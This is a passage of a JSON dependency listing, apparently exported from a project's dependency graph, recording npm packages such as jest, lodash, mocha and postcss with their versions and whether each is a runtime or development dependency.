ptional":false},{"id":13878388346,"package_name":"jest-pnp-resolver","ecosystem":"npm","requirements":"1.2.2","direct":false,"kind":"development","optional":false},{"id":13878388347,"package_name":"jest-regex-util","ecosystem":"npm","requirements":"28.0.2","direct":false,"kind":"development","optional":false},{"id":13878388348,"package_name":"jest-resolve","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388349,"package_name":"jest-resolve-dependencies","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388350,"package_name":"jest-runner","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388351,"package_name":"source-map-support","ecosystem":"npm","requirements":"0.5.13","direct":false,"kind":"development","optional":false},{"id":13878388352,"package_name":"jest-runtime","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388353,"package_name":"jest-snapshot","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388354,"package_name":"semver","ecosystem":"npm","requirements":"7.3.7","direct":false,"kind":"development","optional":false},{"id":13878388355,"package_name":"jest-util","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388356,"package_name":"jest-validate","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388357,"package_name":"camelcase","ecosystem":"npm","requirements":"6.3.0","direct":false,"kind":"development","optional":false},{"id":13878388358,"package_name":"jest-watcher","ecosystem":"npm","requirements":"28.1.1","direct":false,"kind":"development","optional":false},{"id":13878388359,"package_name":"jest-worker","ecosystem":"npm","requirements":"27.4.6","direct":false,"kind":"development","optional":false},{"id":13878388360,"package_name":"joi","ecosystem":"npm","requirements":"17.5.0","direct":false,"kind":"development","optional":false},{"id":13878388361,"package_name":"js-beautify","ecosystem":"npm","requirements":"1.13.5","direct":false,"kind":"development","optional":false},{"id":13878388362,"package_name":"mkdirp","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":13878388363,"package_name":"js-cookie","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"runtime","optional":false},{"id":13878388364,"package_name":"js-tokens","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388365,"package_name":"js-yaml","ecosystem":"npm","requirements":"3.14.1","direct":false,"kind":"development","optional":false},{"id":13878388366,"package_name":"jsbn","ecosystem":"npm","requirements":"0.1.1","direct":false,"kind":"development","optional":false},{"id":13878388367,"package_name":"jsesc","ecosystem":"npm","requirements":"2.5.2","direct":false,"kind":"development","optional":false},{"id":13878388368,"package_name":"json-buffer","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":13878388369,"package_name":"json-parse-even-better-errors","ecosystem":"npm","requirements":"2.3.1","direct":false,"kind":"development","optional":false},{"id":13878388370,"package_name":"json-schema","ecosystem":"npm","requirements":"0.2.3","direct":false,"kind":"development","optional":false},{"id":13878388371,"package_name":"json-schema-traverse","ecosystem":"npm","requirements":"0.4.1","direct":false,"kind":"development","optional":false},{"id":13878388372,"package_name":"json-stable-stringify-without-jsonify","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388373,"package_name":"json-stringify-safe","ecosystem":"npm","requirements":"5.0.1","direct":false,"kind":"development","optional":false},{"id":13878388374,"package_name":"json5","ecosystem":"npm","requirements":"2.2.3","direct":false,"kind":"development","optional":false},{"id":13878388375,"package_name":"jsonfile","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388376,"package_name":"jsplumb","ecosystem":"npm","requirements":"2.15.6","direct":false,"kind":"runtime","optional":false},{"id":13878388377,"package_name":"jsprim","ecosystem":"npm","requirements":"1.4.1","direct":false,"kind":"development","optional":false},{"id":13878388378,"package_name":"keyv","ecosystem":"npm","requirements":"4.0.5","direct":false,"kind":"development","optional":false},{"id":13878388379,"package_name":"kind-of","ecosystem":"npm","requirements":"6.0.3","direct":false,"kind":"development","optional":false},{"id":13878388380,"package_name":"kleur","ecosystem":"npm","requirements":"3.0.3","direct":false,"kind":"development","optional":false},{"id":13878388381,"package_name":"klona","ecosystem":"npm","requirements":"2.0.5","direct":false,"kind":"development","optional":false},{"id":13878388382,"package_name":"lazy-ass","ecosystem":"npm","requirements":"1.6.0","direct":false,"kind":"development","optional":false},{"id":13878388383,"package_name":"leven","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":13878388384,"package_name":"levn","ecosystem":"npm","requirements":"0.4.1","direct":false,"kind":"development","optional":false},{"id":13878388385,"package_name":"lines-and-columns","ecosystem":"npm","requirements":"1.2.4","direct":false,"kind":"development","optional":false},{"id":13878388386,"package_name":"loader-runner","ecosystem":"npm","requirements":"4.2.0","direct":false,"kind":"development","optional":false},{"id":13878388387,"package_name":"loader-utils","ecosystem":"npm","requirements":"1.4.2","direct":false,"kind":"development","optional":false},{"id":13878388388,"package_name":"json5","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388389,"package_name":"locate-path","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":13878388390,"package_name":"lodash","ecosystem":"npm","requirements":"4.17.21","direct":false,"kind":"runtime","optional":false},{"id":13878388391,"package_name":"lodash._arraycopy","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388392,"package_name":"lodash._arrayeach","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388393,"package_name":"lodash._baseassign","ecosystem":"npm","requirements":"3.2.0","direct":false,"kind":"development","optional":false},{"id":13878388394,"package_name":"lodash._baseclone","ecosystem":"npm","requirements":"3.3.0","direct":false,"kind":"development","optional":false},{"id":13878388395,"package_name":"lodash._basecopy","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":13878388396,"package_name":"lodash._basefor","ecosystem":"npm","requirements":"3.0.3","direct":false,"kind":"development","optional":false},{"id":13878388397,"package_name":"lodash._bindcallback","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":13878388398,"package_name":"lodash._getnative","ecosystem":"npm","requirements":"3.9.1","direct":false,"kind":"development","optional":false},{"id":13878388399,"package_name":"lodash._isiterateecall","ecosystem":"npm","requirements":"3.0.9","direct":false,"kind":"development","optional":false},{"id":13878388400,"package_name":"lodash.clone","ecosystem":"npm","requirements":"3.0.3","direct":false,"kind":"development","optional":false},{"id":13878388401,"package_name":"lodash.debounce","ecosystem":"npm","requirements":"4.0.8","direct":false,"kind":"development","optional":false},{"id":13878388402,"package_name":"lodash.defaultsdeep","ecosystem":"npm","requirements":"4.6.1","direct":false,"kind":"development","optional":false},{"id":13878388403,"package_name":"lodash.isarguments","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":13878388404,"package_name":"lodash.isarray","ecosystem":"npm","requirements":"3.0.4","direct":false,"kind":"development","optional":false},{"id":13878388405,"package_name":"lodash.keys","ecosystem":"npm","requirements":"3.1.2","direct":false,"kind":"development","optional":false},{"id":13878388406,"package_name":"lodash.merge","ecosystem":"npm","requirements":"4.6.2","direct":false,"kind":"development","optional":false},{"id":13878388407,"package_name":"log-symbols","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":13878388408,"package_name":"lower-case","ecosystem":"npm","requirements":"2.0.2","direct":false,"kind":"development","optional":false},{"id":13878388409,"package_name":"lowercase-keys","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388410,"package_name":"lru-cache","ecosystem":"npm","requirements":"4.1.5","direct":false,"kind":"development","optional":false},{"id":13878388411,"package_name":"make-dir","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":13878388412,"package_name":"makeerror","ecosystem":"npm","requirements":"1.0.12","direct":false,"kind":"development","optional":false},{"id":13878388413,"package_name":"map-stream","ecosystem":"npm","requirements":"0.1.0","direct":false,"kind":"development","optional":false},{"id":13878388414,"package_name":"marked","ecosystem":"npm","requirements":"4.0.10","direct":false,"kind":"runtime","optional":false},{"id":13878388415,"package_name":"mdn-data","ecosystem":"npm","requirements":"2.0.27","direct":false,"kind":"development","optional":false},{"id":13878388416,"package_name":"media-typer","ecosystem":"npm","requirements":"0.3.0","direct":false,"kind":"development","optional":false},{"id":13878388417,"package_name":"memfs","ecosystem":"npm","requirements":"3.4.1","direct":false,"kind":"development","optional":false},{"id":13878388418,"package_name":"merge-descriptors","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388419,"package_name":"merge-source-map","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":13878388420,"package_name":"merge-stream","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388421,"package_name":"merge2","ecosystem":"npm","requirements":"1.4.1","direct":false,"kind":"development","optional":false},{"id":13878388422,"package_name":"methods","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":13878388423,"package_name":"micromatch","ecosystem":"npm","requirements":"4.0.4","direct":false,"kind":"development","optional":false},{"id":13878388424,"package_name":"mime","ecosystem":"npm","requirements":"1.6.0","direct":false,"kind":"development","optional":false},{"id":13878388425,"package_name":"mime-db","ecosystem":"npm","requirements":"1.51.0","direct":false,"kind":"development","optional":false},{"id":13878388426,"package_name":"mime-types","ecosystem":"npm","requirements":"2.1.34","direct":false,"kind":"development","optional":false},{"id":13878388427,"package_name":"mimic-fn","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":13878388428,"package_name":"mimic-response","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388429,"package_name":"minimalistic-assert","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388430,"package_name":"minimatch","ecosystem":"npm","requirements":"3.0.4","direct":false,"kind":"development","optional":false},{"id":13878388431,"package_name":"minimist","ecosystem":"npm","requirements":"1.2.8","direct":false,"kind":"development","optional":false},{"id":13878388432,"package_name":"minipass","ecosystem":"npm","requirements":"3.1.6","direct":false,"kind":"development","optional":false},{"id":13878388433,"package_name":"minizlib","ecosystem":"npm","requirements":"2.1.2","direct":false,"kind":"development","optional":false},{"id":13878388434,"package_name":"mkdirp","ecosystem":"npm","requirements":"0.5.5","direct":false,"kind":"development","optional":false},{"id":13878388435,"package_name":"mkpath","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388436,"package_name":"mocha","ecosystem":"npm","requirements":"6.2.3","direct":false,"kind":"development","optional":false},{"id":13878388437,"package_name":"ansi-colors","ecosystem":"npm","requirements":"3.2.3","direct":false,"kind":"development","optional":false},{"id":13878388438,"package_name":"ansi-regex","ecosystem":"npm","requirements":"4.1.0","direct":false,"kind":"development","optional":false},{"id":13878388439,"package_name":"cliui","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":13878388440,"package_name":"debug","ecosystem":"npm","requirements":"3.2.6","direct":false,"kind":"development","optional":false},{"id":13878388441,"package_name":"find-up","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388442,"package_name":"glob","ecosystem":"npm","requirements":"7.1.3","direct":false,"kind":"development","optional":false},{"id":13878388443,"package_name":"js-yaml","ecosystem":"npm","requirements":"3.13.1","direct":false,"kind":"development","optional":false},{"id":13878388444,"package_name":"locate-path","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388445,"package_name":"mkdirp","ecosystem":"npm","requirements":"0.5.4","direct":false,"kind":"development","optional":false},{"id":13878388446,"package_name":"ms","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":13878388447,"package_name":"p-locate","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388448,"package_name":"strip-ansi","ecosystem":"npm","requirements":"5.2.0","direct":false,"kind":"development","optional":false},{"id":13878388449,"package_name":"strip-json-comments","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878388450,"package_name":"supports-color","ecosystem":"npm","requirements":"6.0.0","direct":false,"kind":"development","optional":false},{"id":13878388451,"package_name":"which","ecosystem":"npm","requirements":"1.3.1","direct":false,"kind":"development","optional":false},{"id":13878388452,"package_name":"wrap-ansi","ecosystem":"npm","requirements":"5.1.0","direct":false,"kind":"development","optional":false},{"id":13878388453,"package_name":"yargs","ecosystem":"npm","requirements":"13.3.2","direct":false,"kind":"development","optional":false},{"id":13878388454,"package_name":"yargs-parser","ecosystem":"npm","requirements":"13.1.2","direct":false,"kind":"development","optional":false},{"id":13878388455,"package_name":"moment","ecosystem":"npm","requirements":"2.29.1","direct":false,"kind":"runtime","optional":false},{"id":13878388456,"package_name":"ms","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388457,"package_name":"multicast-dns","ecosystem":"npm","requirements":"6.2.3","direct":false,"kind":"development","optional":false},{"id":13878388458,"package_name":"multicast-dns-service-types","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":13878388459,"package_name":"mute-stream","ecosystem":"npm","requirements":"0.0.8","direct":false,"kind":"development","optional":false},{"id":13878388460,"package_name":"nanoid","ecosystem":"npm","requirements":"3.2.0","direct":false,"kind":"development","optional":false},{"id":13878388461,"package_name":"natural-compare","ecosystem":"npm","requirements":"1.4.0","direct":false,"kind":"development","optional":false},{"id":13878388462,"package_name":"negotiator","ecosystem":"npm","requirements":"0.6.2","direct":false,"kind":"development","optional":false},{"id":13878388463,"package_name":"neo-async","ecosystem":"npm","requirements":"2.6.2","direct":false,"kind":"development","optional":false},{"id":13878388464,"package_name":"netmask","ecosystem":"npm","requirements":"2.0.2","direct":false,"kind":"development","optional":false},{"id":13878388465,"package_name":"nightwatch","ecosystem":"npm","requirements":"1.7.13","direct":false,"kind":"development","optional":false},{"id":13878388466,"package_name":"ansi-regex","ecosystem":"npm","requirements":"6.0.1","direct":false,"kind":"development","optional":false},{"id":13878388467,"package_name":"no-case","ecosystem":"npm","requirements":"3.0.4","direct":false,"kind":"development","optional":false},{"id":13878388468,"package_name":"node-environment-flags","ecosystem":"npm","requirements":"1.0.5","direct":false,"kind":"development","optional":false},{"id":13878388469,"package_name":"node-forge","ecosystem":"npm","requirements":"1.2.1","direct":false,"kind":"development","optional":false},{"id":13878388470,"package_name":"node-int64","ecosystem":"npm","requirements":"0.4.0","direct":false,"kind":"runtime","optional":false},{"id":13878388471,"package_name":"node-releases","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878388472,"package_name":"nopt","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":13878388473,"package_name":"normalize-path","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388474,"package_name":"normalize-url","ecosystem":"npm","requirements":"6.1.0","direct":false,"kind":"development","optional":false},{"id":13878388475,"package_name":"npm-run-path","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":13878388476,"package_name":"nth-check","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878388477,"package_name":"oauth-sign","ecosystem":"npm","requirements":"0.9.0","direct":false,"kind":"development","optional":false},{"id":13878388478,"package_name":"object-inspect","ecosystem":"npm","requirements":"1.12.0","direct":false,"kind":"development","optional":false},{"id":13878388479,"package_name":"object-is","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":13878388480,"package_name":"object-keys","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":13878388481,"package_name":"object.assign","ecosystem":"npm","requirements":"4.1.0","direct":false,"kind":"development","optional":false},{"id":13878388482,"package_name":"object.getownpropertydescriptors","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":13878388483,"package_name":"obuf","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":13878388484,"package_name":"on-finished","ecosystem":"npm","requirements":"2.3.0","direct":false,"kind":"development","optional":false},{"id":13878388485,"package_name":"on-headers","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388486,"package_name":"once","ecosystem":"npm","requirements":"1.4.0","direct":false,"kind":"development","optional":false},{"id":13878388487,"package_name":"onetime","ecosystem":"npm","requirements":"5.1.2","direct":false,"kind":"development","optional":false},{"id":13878388488,"package_name":"open","ecosystem":"npm","requirements":"8.4.0","direct":false,"kind":"development","optional":false},{"id":13878388489,"package_name":"opener","ecosystem":"npm","requirements":"1.5.1","direct":false,"kind":"development","optional":false},{"id":13878388490,"package_name":"optionator","ecosystem":"npm","requirements":"0.9.1","direct":false,"kind":"development","optional":false},{"id":13878388491,"package_name":"ora","ecosystem":"npm","requirements":"4.1.1","direct":false,"kind":"development","optional":false},{"id":13878388492,"package_name":"chalk","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388493,"package_name":"log-symbols","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388494,"package_name":"color-convert","ecosystem":"npm","requirements":"1.9.3","direct":false,"kind":"development","optional":false},{"id":13878388495,"package_name":"color-name","ecosystem":"npm","requirements":"1.1.3","direct":false,"kind":"development","optional":false},{"id":13878388496,"package_name":"supports-color","ecosystem":"npm","requirements":"5.5.0","direct":false,"kind":"development","optional":false},{"id":13878388497,"package_name":"p-cancelable","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":13878388498,"package_name":"p-limit","ecosystem":"npm","requirements":"2.3.0","direct":false,"kind":"development","optional":false},{"id":13878388499,"package_name":"p-locate","ecosystem":"npm","requirements":"4.1.0","direct":false,"kind":"development","optional":false},{"id":13878388500,"package_name":"p-map","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388501,"package_name":"p-retry","ecosystem":"npm","requirements":"4.6.1","direct":false,"kind":"development","optional":false},{"id":13878388502,"package_name":"p-try","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":13878388503,"package_name":"pac-proxy-agent","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":13878388504,"package_name":"pac-resolver","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":13878388505,"package_name":"param-case","ecosystem":"npm","requirements":"3.0.4","direct":false,"kind":"development","optional":false},{"id":13878388506,"package_name":"parent-module","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388507,"package_name":"parse-json","ecosystem":"npm","requirements":"5.2.0","direct":false,"kind":"development","optional":false},{"id":13878388508,"package_name":"parseurl","ecosystem":"npm","requirements":"1.3.3","direct":false,"kind":"development","optional":false},{"id":13878388509,"package_name":"pascal-case","ecosystem":"npm","requirements":"3.1.2","direct":false,"kind":"development","optional":false},{"id":13878388510,"package_name":"path-exists","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388511,"package_name":"path-is-absolute","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388512,"package_name":"path-key","ecosystem":"npm","requirements":"3.1.1","direct":false,"kind":"development","optional":false},{"id":13878388513,"package_name":"path-parse","ecosystem":"npm","requirements":"1.0.7","direct":false,"kind":"development","optional":false},{"id":13878388514,"package_name":"path-to-regexp","ecosystem":"npm","requirements":"0.1.7","direct":false,"kind":"development","optional":false},{"id":13878388515,"package_name":"path-type","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388516,"package_name":"pause-stream","ecosystem":"npm","requirements":"0.0.11","direct":false,"kind":"development","optional":false},{"id":13878388517,"package_name":"performance-now","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":13878388518,"package_name":"picocolors","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388519,"package_name":"picomatch","ecosystem":"npm","requirements":"2.3.1","direct":false,"kind":"development","optional":false},{"id":13878388520,"package_name":"pify","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":13878388521,"package_name":"pirates","ecosystem":"npm","requirements":"4.0.5","direct":false,"kind":"development","optional":false},{"id":13878388522,"package_name":"pkg-dir","ecosystem":"npm","requirements":"4.2.0","direct":false,"kind":"development","optional":false},{"id":13878388523,"package_name":"portfinder","ecosystem":"npm","requirements":"1.0.28","direct":false,"kind":"development","optional":false},{"id":13878388524,"package_name":"async","ecosystem":"npm","requirements":"2.6.3","direct":false,"kind":"development","optional":false},{"id":13878388525,"package_name":"debug","ecosystem":"npm","requirements":"3.2.7","direct":false,"kind":"development","optional":false},{"id":13878388526,"package_name":"ms","ecosystem":"npm","requirements":"2.1.3","direct":false,"kind":"development","optional":false},{"id":13878388527,"package_name":"postcss","ecosystem":"npm","requirements":"7.0.32","direct":false,"kind":"development","optional":false},{"id":13878388528,"package_name":"postcss-selector-parser","ecosystem":"npm","requirements":"6.0.8","direct":false,"kind":"development","optional":false},{"id":13878388529,"package_name":"postcss-value-parser","ecosystem":"npm","requirements":"4.2.0","direct":false,"kind":"development","optional":false},{"id":13878388530,"package_name":"supports-color","ecosystem":"npm","requirements":"6.1.0","direct":false,"kind":"development","optional":false},{"id":13878388531,"package_name":"prelude-ls","ecosystem":"npm","requirements":"1.2.1","direct":false,"kind":"development","optional":false},{"id":13878388532,"package_name":"prettier","ecosystem":"npm","requirements":"1.19.1","direct":false,"kind":"development","optional":false},{"id":13878388533,"package_name":"pretty","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388534,"package_name":"pretty-error","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388535,"package_name":"pretty-format","ecosystem":"npm","requirements":"27.4.6","direct":false,"kind":"development","optional":false},{"id":13878388536,"package_name":"process-nextick-args","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878388537,"package_name":"prompts","ecosystem":"npm","requirements":"2.4.2","direct":false,"kind":"development","optional":false},{"id":13878388538,"package_name":"proto-list","ecosystem":"npm","requirements":"1.2.4","direct":false,"kind":"development","optional":false},{"id":13878388539,"package_name":"proxy-addr","ecosystem":"npm","requirements":"2.0.6","direct":false,"kind":"development","optional":false},{"id":13878388540,"package_name":"proxy-agent","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":13878388541,"package_name":"lru-cache","ecosystem":"npm","requirements":"5.1.1","direct":false,"kind":"development","optional":false},{"id":13878388542,"package_name":"yallist","ecosystem":"npm","requirements":"3.1.1","direct":false,"kind":"development","optional":false},{"id":13878388543,"package_name":"proxy-from-env","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":13878388544,"package_name":"ps-tree","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":13878388545,"package_name":"pseudomap","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388546,"package_name":"psl","ecosystem":"npm","requirements":"1.8.0","direct":false,"kind":"development","optional":false},{"id":13878388547,"package_name":"pump","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388548,"package_name":"punycode","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":13878388549,"package_name":"q","ecosystem":"npm","requirements":"1.5.1","direct":false,"kind":"runtime","optional":false},{"id":13878388550,"package_name":"qs","ecosystem":"npm","requirements":"6.11.2","direct":false,"kind":"development","optional":false},{"id":13878388551,"package_name":"queue-microtask","ecosystem":"npm","requirements":"1.2.3","direct":false,"kind":"development","optional":false},{"id":13878388552,"package_name":"quick-lru","ecosystem":"npm","requirements":"5.1.1","direct":false,"kind":"development","optional":false},{"id":13878388553,"package_name":"randombytes","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":13878388554,"package_name":"range-parser","ecosystem":"npm","requirements":"1.2.1","direct":false,"kind":"development","optional":false},{"id":13878388555,"package_name":"raw-body","ecosystem":"npm","requirements":"2.4.2","direct":false,"kind":"development","optional":false},{"id":13878388556,"package_name":"bytes","ecosystem":"npm","requirements":"3.1.1","direct":false,"kind":"development","optional":false},{"id":13878388557,"package_name":"http-errors","ecosystem":"npm","requirements":"1.8.1","direct":false,"kind":"development","optional":false},{"id":13878388558,"package_name":"setprototypeof","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":13878388559,"package_name":"toidentifier","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388560,"package_name":"raw-loader","ecosystem":"npm","requirements":"4.0.2","direct":false,"kind":"development","optional":false},{"id":13878388561,"package_name":"react-is","ecosystem":"npm","requirements":"17.0.2","direct":false,"kind":"development","optional":false},{"id":13878388562,"package_name":"readable-stream","ecosystem":"npm","requirements":"2.3.6","direct":false,"kind":"development","optional":false},{"id":13878388563,"package_name":"readdirp","ecosystem":"npm","requirements":"3.6.0","direct":false,"kind":"development","optional":false},{"id":13878388564,"package_name":"rechoir","ecosystem":"npm","requirements":"0.7.1","direct":false,"kind":"development","optional":false},{"id":13878388565,"package_name":"regenerate","ecosystem":"npm","requirements":"1.4.2","direct":false,"kind":"development","optional":false},{"id":13878388566,"package_name":"regenerate-unicode-properties","ecosystem":"npm","requirements":"9.0.0","direct":false,"kind":"development","optional":false},{"id":13878388567,"package_name":"regenerator-runtime","ecosystem":"npm","requirements":"0.13.9","direct":false,"kind":"development","optional":false},{"id":13878388568,"package_name":"regenerator-transform","ecosystem":"npm","requirements":"0.14.5","direct":false,"kind":"development","optional":false},{"id":13878388569,"package_name":"regexp.prototype.flags","ecosystem":"npm","requirements":"1.3.0","direct":false,"kind":"development","optional":false},{"id":13878388570,"package_name":"regexpp","ecosystem":"npm","requirements":"3.2.0","direct":false,"kind":"development","optional":false},{"id":13878388571,"package_name":"regexpu-core","ecosystem":"npm","requirements":"4.8.0","direct":false,"kind":"development","optional":false},{"id":13878388572,"package_name":"regjsgen","ecosystem":"npm","requirements":"0.5.2","direct":false,"kind":"development","optional":false},{"id":13878388573,"package_name":"regjsparser","ecosystem":"npm","requirements":"0.7.0","direct":false,"kind":"development","optional":false},{"id":13878388574,"package_name":"jsesc","ecosystem":"npm","requirements":"0.5.0","direct":false,"kind":"development","optional":false},{"id":13878388575,"package_name":"relateurl","ecosystem":"npm","requirements":"0.2.7","direct":false,"kind":"development","optional":false},{"id":13878388576,"package_name":"renderkid","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388577,"package_name":"request","ecosystem":"npm","requirements":"2.88.2","direct":false,"kind":"development","optional":false},{"id":13878388578,"package_name":"request-promise","ecosystem":"npm","requirements":"4.2.6","direct":false,"kind":"development","optional":false},{"id":13878388579,"package_name":"request-promise-core","ecosystem":"npm","requirements":"1.1.4","direct":false,"kind":"development","optional":false},{"id":13878388580,"package_name":"tough-cookie","ecosystem":"npm","requirements":"2.5.0","direct":false,"kind":"development","optional":false},{"id":13878388581,"package_name":"qs","ecosystem":"npm","requirements":"6.5.3","direct":false,"kind":"development","optional":false},{"id":13878388582,"package_name":"uuid","ecosystem":"npm","requirements":"3.4.0","direct":false,"kind":"development","optional":false},{"id":13878388583,"package_name":"require-directory","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":13878388584,"package_name":"require-from-string","ecosystem":"npm","requirements":"2.0.2","direct":false,"kind":"development","optional":false},{"id":13878388585,"package_name":"require-main-filename","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388586,"package_name":"requires-port","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388587,"package_name":"resolve","ecosystem":"npm","requirements":"1.21.0","direct":false,"kind":"development","optional":false},{"id":13878388588,"package_name":"resolve-alpn","ecosystem":"npm","requirements":"1.2.1","direct":false,"kind":"development","optional":false},{"id":13878388589,"package_name":"resolve-cwd","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388590,"package_name":"resolve-from","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":13878388591,"package_name":"resolve.exports","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":13878388592,"package_name":"responselike","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388593,"package_name":"restore-cursor","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":13878388594,"package_name":"retry","ecosystem":"npm","requirements":"0.13.1","direct":false,"kind":"development","optional":false},{"id":13878388595,"package_name":"reusify","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":13878388596,"package_name":"rimraf","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":13878388597,"package_name":"run-parallel","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":13878388598,"package_name":"rxjs","ecosystem":"npm","requirements":"7.5.2","direct":false,"kind":"development","optional":false},{"id":13878388599,"package_name":"safe-buffer","ecosystem":"npm","requirements":"5.1.2","direct":false,"kind":"development","optional":false},{"id":13878388600,"package_name":"safer-buffer","ecosystem":"npm","requirements":"2.1.2","direct":false,"kind":"development","o